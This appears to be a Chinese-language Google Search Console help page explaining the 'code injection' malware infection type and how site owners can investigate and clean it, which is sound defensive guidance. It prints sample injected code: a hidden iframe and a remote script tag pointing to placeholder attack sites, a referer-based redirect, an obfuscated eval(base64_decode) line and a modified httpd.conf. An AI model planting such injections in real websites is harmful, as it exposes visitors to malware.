恶意软件感染类型:代码注入

如果 Google Search Console 中有网页标记为“代码注入”这种恶意软件感染类型,这是什么意思?

这表示您网站上的网页已被篡改并含有恶意代码,例如指向恶意软件攻击性网站的 iframe。

要了解关于恶意软件的更多常规信息,请参阅评估受破坏程度(遭恶意软件入侵)

如何调查“代码注入”恶意软件类型?

首先,避免使用浏览器来查看您网站上受感染的网页。恶意软件通常会利用浏览器漏洞进行传播,因此在浏览器中打开感染恶意软件的网页可能会损坏计算机。

不妨考虑通过使用 cURLWget 发起 HTTP 请求(例如,抓取网页)来确认相关行为。这些免费提供的工具有助于诊断重定向行为,而且您还可以灵活地在其中加入引荐来源网址或用户代理信息。通过只向使用特定用户代理或来自特定引荐来源网址的用户提供恶意内容,黑客可以将更多的“真实用户”作为目标,并可更好地躲避网站所有者和恶意软件扫描工具的检测(您的网站必须处于在线状态才能使用这些工具)。

例如:

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <your-url>
例如
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

接着,登录您的文件系统。对写入“代码注入”受感染网址的所有资源进行调查。以下列出了一些恶意代码注入的示例:

<iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
  style="display:none" width="0"></iframe>
<script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
<script>
  if (document.referrer.match(/google\.com/)) {
    window.location("http://malware-attack-site/");
  }
</script>
eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c
  • 指向攻击性网站的 iframe
  • 从攻击性网站调用并运行脚本的 JavaScript 或其他脚本语言
  • 将浏览器重定向到攻击性网站的脚本
  • 试图躲避检测的迷惑性恶意代码
  • 旨在随机将有害代码写入其他无害脚本的共享对象文件

调查网站上可能存在的所有有害代码。搜索 [iframe] 字样可能有助于找出 iframe 代码。其他实用的关键字还包括“script”、“eval”和“unescape”。例如,在基于 Unix 的系统上:

$grep -irn "iframe" ./ | less

如何清理遭到“代码注入”恶意软件攻击的网站?

为清理网站做好准备后,您既可将受影响的文件替换为最近的正常备份文件,也可从各网页以及所有相关的脚本函数或文件中移除代码注入内容。如果您修改了服务器配置文件,则可能需要重新启动网络服务器才能使更改生效。

请注意,移除恶意代码并不能修复最初导致黑客能够入侵网站的潜在漏洞。如果不解决根本问题,您的网站在将来可能还会遭到入侵。要详细了解如何清理整个网站,请参阅网站遭到入侵的相关帮助

该内容对您有帮助吗?
您有什么改进建议?